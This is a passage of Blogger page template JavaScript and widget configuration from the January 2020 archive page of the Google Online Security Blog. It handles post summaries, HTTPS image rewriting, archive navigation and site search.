nodeText = node.innerText; } if (node.nodeName == 'DIV' || node.nodeName == 'B') { // Don't end early if we haven't seen enough words. if (seenWords < 10) { continue; } if (i > 0) { summaryHtml = this.finalizeSummary(summaryHtml, content.childNodes[i-1]); } break; } summaryHtml += node.outerHTML; } else if (node.nodeType == 3) { nodeText = node.nodeValue; summaryHtml += nodeText + ' '; } var words = nodeText.match(/\S+\s*/g); if (!words) { continue; } var remain = numWords - seenWords; if (words.length >= remain) { summaryHtml = this.finalizeSummary(summaryHtml, node); break; } seenWords += words.length; } return summaryHtml; }; BreakpointHandler.prototype.detect = function() { var match, pl = /\+/g, search = /([^&=]+)=?([^&]*)/g, decode = function (s) { return decodeURIComponent(s.replace(pl, " ")); }, query = window.location.search.substring(1); var urlParams = {}; while (match = search.exec(query)) urlParams[decode(match[1])] = decode(match[2]); this.isListPage = $('html').hasClass('list-page'); this.isMobile = urlParams['m'] === '1'; this.isHomePage = window.location.pathname == '/'; }; BreakpointHandler.prototype.initContent = function() { var self = this; $('.post').each(function(index) { var body = $(this).children('.post-body')[0]; var content = $(body).children('.post-content')[0]; $(content).addClass('post-original'); var data = $(content).children('script').html(); data = self.rewriteForSSL(data); if (document.body.className.indexOf('is-preview') !== -1) { // If exists, extract specified editor's preview. var match = data.match(/([\s\S]+?)<div data-is-preview.+?>([\s\S]+)<\/div>/m); if (match) { data = match[1]; } } // Prevent big images from loading when they aren't needed. // This must be done as a pre-injection step, since image loading can't be // canceled once embedded into the DOM. if (self.isListPage && self.isMobile) { data = data.replace(/<(img|iframe) .+?>/g, ''); } // Insert template to be rendered as nodes. content.innerHTML = data; if (self.isListPage) { var summary = document.createElement('div'); $(summary).addClass('post-content'); $(summary).addClass('post-summary'); body.insertBefore(summary, content); if (match) { // Use provided summary. summary.innerHTML = match[2]; } else { // Generate a summary. // Summary generation relies on DOM, so it must occur after content is // inserted into the page. summary.innerHTML = self.generateSummaryFromContent(content, 30); } // Add read more link to summary. var titleAnchor = $(this).find('.title a')[0]; var link = titleAnchor.cloneNode(true); link.innerHTML = 'Read More'; $(link).addClass('read-more'); summary.appendChild(link); } }); // Firefox does not allow for proper styling of BR. if (navigator.userAgent.indexOf('Firefox') > -1) { $('.post-content br').replaceWith('<span class="space"></span>'); } $('.loading').removeClass('loading'); }; BreakpointHandler.prototype.process = function() { if (!this.initted) { var makeInsecureImageRegex = function(hosts) { var whitelist = hosts.join('|').replace(/\./g,'\\.'); // Normal image tags, plus input images (yes, this is possible!) return new RegExp('(<(img|input)[^>]+?src=("|\'))http:\/\/(' + whitelist +')', 'g'); }; this.sslImageRegex = makeInsecureImageRegex(BreakpointHandler.KNOWN_HTTPS_HOSTS); this.sslImageCurrentDomainRegex = makeInsecureImageRegex([window.location.hostname]); this.detect(); this.initContent(); this.initted = true; } }; BreakpointHandler.KNOWN_HTTPS_HOSTS = [ "www.google.org", "www.google.com", "services.google.com", "blogger.com", "draft.blogger.com", "www.blogger.com", "photos1.blogger.com", "photos2.blogger.com", "photos3.blogger.com", "blogblog.com", "img1.blogblog.com", "img2.blogblog.com", "www.blogblog.com", "www1.blogblog.com", "www2.blogblog.com", "0.bp.blogspot.com", "1.bp.blogspot.com", "2.bp.blogspot.com", "3.bp.blogspot.com", "4.bp.blogspot.com", "lh3.googleusercontent.com", "lh4.googleusercontent.com", "lh5.googleusercontent.com", "lh6.googleusercontent.com", "themes.googleusercontent.com", ]; BreakpointHandler.prototype.rewriteForSSL = function(html) { // Handle HTTP -> HTTPS source replacement of images, movies, and other embedded content. return html.replace(this.sslImageRegex, '$1https://$4') .replace(this.sslImageCurrentDomainRegex, '$1//$4') .replace(/(<(embed|iframe)[^>]+?src=("|'))http:\/\/([^"']*?(youtube|picasaweb\.google)\.com)/g, '$1https://$4') // Slideshow SWF takes a image host, so we need to rewrite that parameter. .replace(/(<embed[^>]+?feed=http(?=[^s]))/g, '$1s'); }; $(document).ready(function() { var handler = new BreakpointHandler(); handler.process(); // Top-level navigation. $(".BlogArchive .tab").click(function(ev) { ev.preventDefault(); $(this).parent().toggleClass('active'); $(this).siblings().slideToggle(300); }); $(".Label .tab").click(function(ev) { ev.preventDefault(); $(this).parent().toggleClass('active'); $(this).siblings().slideToggle(300); }); // Blog archive year expansion. $('.BlogArchive .intervalToggle').click(function(ev) { ev.preventDefault(); if ($(this).parent().hasClass('collapsed')) { $(this).parent().removeClass('collapsed'); $(this).parent().addClass('expanded'); } else { $(this).parent().removeClass('expanded'); $(this).parent().addClass('collapsed'); } }); // Reverse order of months. $('.BlogArchive .intervalToggle + div').each(function(_, items) { var year = $(this); year.children().each(function(_, month) { year.prepend(month); }); }); // Set anchors to open in new tab. $('.post-content img').parent().each(function(_, node) { if (node.nodeName == 'A') { $(this).attr('target', '_blank'); } }); // Process search requests. $('.searchBox input').on("keypress", function(ev) { if (ev.which == 13) { window.location.href = 'https://www.google.com/search?q=site%3A' + window.location.hostname + '%20' + encodeURIComponent ($(this).val()); } }); }); //]]> </script> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/984859869-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY5tygZCkLjjkvSKkmBOtXBfM-caMA:1732438288314';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d1176949257541686127','//security.googleblog.com/2020/01/','1176949257541686127'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '1176949257541686127', 'title': 'Google Online Security Blog', 'url': 'https://security.googleblog.com/2020/01/', 'canonicalUrl': 'https://security.googleblog.com/2020/01/', 'homepageUrl': 'https://security.googleblog.com/', 'searchUrl': 'https://security.googleblog.com/search', 'canonicalHomepageUrl': 'https://security.googleblog.com/', 'blogspotFaviconUrl': 'https://security.googleblog.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': true, 'httpsEnabled': true, 'enabledCommentProfileImages': false, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': 'G-K46T604G22', 'analytics4': true, 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Google Online Security Blog - Atom\x22 href\x3d\x22https://security.googleblog.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22Google Online Security Blog - RSS\x22 href\x3d\x22https://security.googleblog.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Google Online Security Blog - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/1176949257541686127/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/d78375fb222d99b3', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Share to X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'archive', 'pageName': 'January 2020', 'pageTitle': 'Google Online Security Blog: January 2020'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'Google Online Security Blog', 'description': 'The latest news and insights from Google on security and safety on the Internet', 'url': 'https://security.googleblog.com/2020/01/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2020, 'month': 1, 'rangeMessage': 'Showing posts from January, 2020'}}}]); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML8', 'sidebar-top', document.getElementById('HTML8'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar', document.getElementById('Label1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Loading\x26hellip;'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebar', document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'sidebar-bottom', document.getElementById('HTML5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'sidebar-bottom', document.getElementById('HTML1'), {}, 'displayModeFull')); </script> </body> </html>